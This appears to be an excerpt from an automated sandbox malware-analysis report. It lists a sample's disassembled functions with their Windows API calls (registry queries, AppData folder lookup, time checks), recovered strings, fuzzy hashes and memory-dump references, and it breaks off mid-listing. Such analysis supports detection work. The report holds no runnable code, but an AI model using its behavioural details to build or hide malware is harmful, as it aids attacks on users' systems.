                                  • Instruction ID: f814cddcdb96ba351b4afd931c648ed2af54a63156f0349802ed7d1ed4284ab6
                                  • Opcode Fuzzy Hash: c5ee728d8c39ab3a05440f4d1477117fe0b0ccf53e2aa719ce8cfe901fbeee4b
                                  • Instruction Fuzzy Hash: 9141AD3560010AAFCB26DF78D944BAABBF8EF44700F15825DA949D7244EF34D946CB90
                                  Function 00401B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00401B72
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,0040CFEC), ref: 0040184F
                                    • Part of subcall function 00401820: lstrlen.KERNEL32(01196D30), ref: 00401860
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 00401887
                                    • Part of subcall function 00401820: lstrcat.KERNEL32(00000000,00000000), ref: 00401892
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 004018C1
                                    • Part of subcall function 00401820: lstrlen.KERNEL32(00414FA0), ref: 004018D3
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 004018F4
                                    • Part of subcall function 00401820: lstrcat.KERNEL32(00000000,00414FA0), ref: 00401900
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 0040192F
                                  • sscanf.NTDLL ref: 00401B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00401BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00401BC6
                                  • ExitProcess.KERNEL32 ref: 00401BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: eff2605a4646b24843e745c15f784a717a420d44b3a94f4ea5ecae32a8f4b8ce
                                  • Instruction ID: c11dba737a3768f9d21b3cd3efb1a1d5e305c6057260892cb6b125be5862a4f5
                                  • Opcode Fuzzy Hash: eff2605a4646b24843e745c15f784a717a420d44b3a94f4ea5ecae32a8f4b8ce
                                  • Instruction Fuzzy Hash: BF21E4B1518301AF8350DF65D88489BBBF9EFD8315F409A1EF599C3260E734E5048BA6
                                  Function 00403130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00403166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,0119BC50,00000000,00020119,?), ref: 0040318C
                                  • RegQueryValueExA.ADVAPI32(?,011AF178,00000000,00000000,00000000,000000FF), ref: 004031A7
                                  • RegCloseKey.ADVAPI32(?), ref: 004031B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: ecd85a1c0c07ef789dfc5a2b4f138f3a363fd90ebb08955f900716e5d7cbf05d
                                  • Instruction ID: adecec09d813ef318e89b4d6510fe26187bcae3fbd1d5c631f212af0c797eda1
                                  • Opcode Fuzzy Hash: ecd85a1c0c07ef789dfc5a2b4f138f3a363fd90ebb08955f900716e5d7cbf05d
                                  • Instruction Fuzzy Hash: 7B114276A40205AFD714CF95DD45FEBBBBDE748B11F10822AFA05E3680DB75590087A1
                                  Function 003E8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E8996
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1D5
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E89CD
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 0f48d5d203e61ddbbb5a6a1118004955240a988b99e3720ea768b740f24670e4
                                  • Instruction ID: e3a2ed5f2496b38cf43cd3169d04d10d2aca340d3942317228209849d6a0b41d
                                  • Opcode Fuzzy Hash: 0f48d5d203e61ddbbb5a6a1118004955240a988b99e3720ea768b740f24670e4
                                  • Instruction Fuzzy Hash: 8521DB72B002A08BC722DB5DE840A6AF795DBA1761B110A3FF155CB2C1CB71D851C3A9
                                  Function 003E8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E8883
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 9cf85e58440a098ebd7d0955937c43d6b8a8594b964d71b1bb64a434bcc38610
                                  • Instruction ID: 1e2d2e16b01d64fb785f56a1a8f07214d039bc8d39e4f9440b0d7ffebeab2a58
                                  • Opcode Fuzzy Hash: 9cf85e58440a098ebd7d0955937c43d6b8a8594b964d71b1bb64a434bcc38610
                                  • Instruction Fuzzy Hash: F031C7B5E005159FCB08DF58C8906AEBBB6EB88350F148279E919EF385DB34AD01CBD1
                                  Function 00405910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405922
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: b37b2b5713ec790fca700b11953d86ef07fffc013cf4e2e831a0bc0efa35055d
                                  • Instruction ID: b1a53de103974bf6cb36f84a15e834d8c461912da7f4ec65e90d6d696441d61a
                                  • Opcode Fuzzy Hash: b37b2b5713ec790fca700b11953d86ef07fffc013cf4e2e831a0bc0efa35055d
                                  • Instruction Fuzzy Hash: C3115170304B40CBC7218B2CA900B1B77E1EBD2760F250A6FE0D19B6D5C775D841CBA9
                                  Function 00403CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0040A430,000000FF), ref: 00403D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00403D27
                                  • wsprintfA.USER32 ref: 00403D37
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 651aa80b1aab8ccad508ed3e5926bec80654d41e44ccf4e47354c076cb899366
                                  • Instruction ID: c210310cf0420003b38bca1a77ac680061be19ec5fa0c3afc922d525d716e542
                                  • Opcode Fuzzy Hash: 651aa80b1aab8ccad508ed3e5926bec80654d41e44ccf4e47354c076cb899366
                                  • Instruction Fuzzy Hash: 8F01C071A40300BFE7109B55DC4AFAABB79FB49B62F18411AFA05E72D0CBB41900C6B6
                                  Function 0040926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00409279
                                    • Part of subcall function 004087FF: __amsg_exit.LIBCMT ref: 0040880F
                                  • __amsg_exit.LIBCMT ref: 00409299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptd
                                  • String ID: XuA$XuA
                                  • API String ID: 441000147-2907057905
                                  • Opcode ID: da0c810ff8d0a88f008529dc5025e5fa3e1883d752c66c6335f50707b5b84182
                                  • Instruction ID: 2f1cf5760e44fdbc6f77484325d49518b8569d4e650cd22a499e9878ebd393b7
                                  • Opcode Fuzzy Hash: da0c810ff8d0a88f008529dc5025e5fa3e1883d752c66c6335f50707b5b84182
                                  • Instruction Fuzzy Hash: 04016D32D86A15ABDB11BB6A984579AB3606F00B18F18447FE800776C6CB3C6D41DBDE
                                  Function 003E8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E8737
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: cba95a79d2db91cae91b99178446a33ff2b160a48fcbf7c31a5ef0cc2f2cd348
                                  • Instruction ID: 2ca198fab6d274b84c2b7a624fe7f8c09bb8d8d7a3a25150861a800f4e181f06
                                  • Opcode Fuzzy Hash: cba95a79d2db91cae91b99178446a33ff2b160a48fcbf7c31a5ef0cc2f2cd348
                                  • Instruction Fuzzy Hash: 48F09037F000310F8315663E8D8449EA94656E539033AD735E85EEF2D9DC71EC8295D4
                                  Function 004086D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040781C: __mtinitlocknum.LIBCMT ref: 00407832
                                    • Part of subcall function 0040781C: __amsg_exit.LIBCMT ref: 0040783E
                                  • ___addlocaleref.LIBCMT ref: 00408756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$XuA$xtA
                                  • API String ID: 3105635775-3658433698
                                  • Opcode ID: ce4343edb25dbe1a0f350be2c4c097a7a8d24cb99b5817370d82bbb5879c4aa1
                                  • Instruction ID: d5304a8195d48757963ea68b4c6d71e33e10c7708ac21da7642e079e83a449d4
                                  • Opcode Fuzzy Hash: ce4343edb25dbe1a0f350be2c4c097a7a8d24cb99b5817370d82bbb5879c4aa1
                                  • Instruction Fuzzy Hash: B6018472845700EAD720AF7AD84574AB7E0AF51318F20C92FE0D9676E5CBB8B544CB19
                                  Function 003FE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FE544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE573
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE581
                                  • lstrcat.KERNEL32(?,011AF2D8), ref: 003FE59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
